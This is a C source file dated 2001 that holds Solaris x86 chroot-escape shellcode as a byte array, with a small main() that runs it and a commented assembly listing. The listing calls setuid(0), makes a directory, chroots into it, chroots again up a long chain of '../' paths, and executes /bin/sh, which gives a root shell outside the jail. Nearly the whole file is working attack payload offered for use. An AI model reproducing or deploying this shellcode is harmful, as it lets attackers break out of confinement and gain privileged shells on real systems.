/* 
 * chroot-break shellcode (solaris x86)
 * truefinder, seo@igrus.inha.ac.kr 
 * (2001/7/13)
 */

char code[] =
 "\x89\xe5\x81\xc4\x38\xff\xff\xff\xc7\x85\x38\xff\xff\xff\x73\x68"
 "\xff\xff\x31\xc0\x88\x85\x3a\xff\xff\xff\x31\xd2\xc6\x45\x8f\x9a"
 "\x89\x55\x90\x89\x55\x94\xc6\x45\x94\x07\xc6\x45\x96\xc3\x89\x55"
 "\x98\x89\xef\x83\xef\x71\x31\xd2\x52\x52\x52\x83\xc0\x17\xff\xd7"
 "\x8d\x9d\x38\xff\xff\xff\x83\xec\x10\xb8\xff\xf1\xff\xff\x50\x53"
 "\x31\xc0\x83\xc0\x50\xff\xd7\x53\x31\xc0\x83\xc0\x3d\xff\xd7\xeb"
 "\x28\x5e\x89\xf3\x53\x31\xc0\x88\x66\x1e\x83\xc0\x3d\xff\xd7\xeb"
 "\x3c\x5e\x31\xd2\x52\x88\x56\x07\x89\x76\x08\x89\x56\x0c\x8d\x46"
 "\x08\x50\x56\x31\xc0\xb0\x3b\xff\xd7\xe8\xd3\xff\xff\xff\x2e\x2e"
 "\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f"
 "\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\xe8\xbf\xff"
 "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

void (*f)();
main()
{
  f = code;
  f();
}

/* assembly code here
 *
# setuid(0);
# mkdir("sh",755);
# chroot("sh");
# chroot("../../../../../../../../../../../../../");
# execve("/bin/sh", ... );

.file   "chroot2.s"
.version        "1.1"
.ident  "lcall sys call from stack"

#.data
#sys_vec:
#       .long 0x0000009a        # lcall 
#       .long 0xc3000700        #
#       .long 0x5e10ebc3        # ret

.text
.globl main
main:

var_set: 
        movl %esp, %ebp
        add $-200, %esp
        movl $0xffff6873, -200(%ebp)
        xorl %eax,%eax
        movb %al, -198(%ebp)

call_set:
        xorl  %edx,%edx
        movb  $0x9a,-113(%ebp)
        movl  %edx,-112(%ebp)
        movl  %edx,-108(%ebp)
        movb  $0x07,-108(%ebp)
        movb  $0xc3,-106(%ebp)
        movl  %edx,-104(%ebp)
        movl %ebp, %edi
        sub $113, %edi


# setuid(0);
setuid_start:
        xorl %edx,%edx
        pushl %edx      # arg1
        pushl %edx      # (0)
        pushl %edx      # ret
        addl $0x17,%eax
#       lcall $0x7, $0x0
#call sys_vec
call *%edi

# mkdir("sh");
mkdir_start:
#       leal cdir , %ebx
        leal -200(%ebp), %ebx
#       pushl $0x7
#       pushl %ebx
#       pushl $0x0
#       pushl $0x0
sub $16, %esp

        movl $0xfffff1ff,%eax # 0x000001ff
        pushl %eax
        pushl %ebx
#       pushl $0xffff   # ret 
        
        xorl %eax,%eax
        addl $0x50, %eax
#       lcall $0x7,$0x0
#call sys_vec
call *%edi

# chroot("sh");
chroot_start_1:
#       leal  cdir, %ebx
        pushl %ebx
#       pushl $0xffff   # ret
        
        xorl %eax,%eax
        addl $0x3d, %eax
#       lcall $0x7, $0x0
#call sys_vec
call *%edi

# chroot("../../../../../../../../../../../");
chroot_start_2:
        jmp dot_string
var_set_2:
        popl %esi
        movl %esi, %ebx
#       leal droot, %ebx
        pushl %ebx
#       pushl $0xffff   # ret
        xorl %eax,%eax
        movb %ah, 30(%esi)
        addl $0x3d, %eax
#       lcall $0x7, $0x0
#call sys_vec
call *%edi


# execve( name[0], name, 0);
        jmp string_loc

shell_start:
        popl %esi

        xorl %edx,%edx
        pushl %edx       # dummy ret
                                # "/bin/sh"
        movb %dl, 0x7(%esi)    # \0
        movl %esi, 0x8(%esi)    # addr
        movl %edx, 0xc(%esi)    #

        leal 0x8(%esi),%eax
        pushl %eax
        pushl %esi

#       pushl %edx       # dummy ret
        xorl %eax,%eax
        movb $0x3b,%al
##      lcall $0x7,$0x0
call *%edi

# exit(0):
#       movl $0x1,%eax
#       movl $0x0,%edx
#       lcall $0x7,$0x0
#call sys_vec
#call *%edi
        
dot_string:
        call var_set_2
        .byte '.','.','/','.','.','/','.','.','/','.','.','/','.','.','/'
        .byte '.','.','/','.','.','/','.','.','/','.','.','/','.','.','/','.'
string_loc:
        call shell_start
        .string "/bin/sh"
*/